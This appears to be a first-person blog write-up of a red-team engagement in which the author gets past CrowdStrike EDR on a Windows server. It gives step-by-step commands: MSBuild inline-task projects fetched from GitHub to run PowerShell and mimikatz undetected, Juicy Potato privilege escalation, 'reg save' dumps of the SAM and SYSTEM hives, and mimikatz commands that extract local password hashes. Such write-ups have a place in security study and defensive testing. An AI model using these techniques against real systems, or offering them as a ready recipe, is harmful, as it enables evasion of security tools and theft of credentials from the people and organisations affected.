How I Bypassed Crowdstrike Restriction

3 min readJul 12, 2020

Crowdstrike is a set of advanced EDR (endpoint detection and response) applications and techniques to provide an industry-leading NGAV (next generation anti-virus) offering machine learning to ensure breaches are stopped before they occur, Crowdstrike monitors processes running on OS by hooking, so if we run any malicious process on a machine it will monitor and log it, this all happens at in kernel level.

In this post, I am going to explain how i managed to bypass crowdstrike EDR and dump hashes executing mimiketz in crowdstrike network,

In my recent red teaming assessment, I got foothold on web application with limited user access (IIS user) running on windows server 2012 R2, so my first task was to do privilege escalation and get local admin privileges.

for this, I ran juicy potato exploit (a FUD by Anurag Srivastava, thanks!) and created a user with admin privileges

Later, i tried to dump lsass so i could get other user hash using procdump but crowdstrike blocked procdump categorizing as malicious behavior… hmmm…

I tried all known techniques to dump lsass but failed. Sigh!

My googling skills came to rescue as I luckily found some interesting writeups and scripts but best and most trusted script i found is by: — Casey Smith, Twitter: @subTee

https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj

To run this script, save it in any directory with write permission, execute and behold the magic ;

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj

I was able to run PowerShell without restriction and crowdstrike sleeping. My next task was to dump hashes and perform the post exploitation.

I knew this technique will work in this scenario, so I downloaded one more script also written by Casey Smith.

https://raw.githubusercontent.com/3gstudent/msbuild-inline-task/master/executes%20mimikatz.xml

As before, save the script in any writable directory and run the below command.

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe mimiketz.xml

Voila! I got mimiketz shell :P with crowdstrike & symantec still sleeping, time to dump passwords.

mimiketz # privilege::debug

sekurlsa::logonpasswords

I then started to dump hash but no luck as I got error due crowdstrike hooking to the lsass process and not allowing me to dump, so i started testing another way to dump, dump offline

For this, I needed to extract and copy the SYSTEM and SAM registry hives for the local machine.

reg save HKLM\SYSTEM SystemBkup.hiv

reg save HKLM\SAM SamBkup.hiv

mimikatz # privilege::debug

mimikatz # token::whoami

If you’re not system or using an impersonated system token, you'll have access denied error:

mimikatz # token::elevate

I then ran “log hash.txt” so that the next command outputs to a txt file.

mimikatz::log hash.txt

Then ran the “lsadump::sam SystemBkup.hiv SamBkup.hiv” to display the username and hashes for all local users.

mimikatz::lsadump::sam SystemBkup.hiv SamBkup.hiv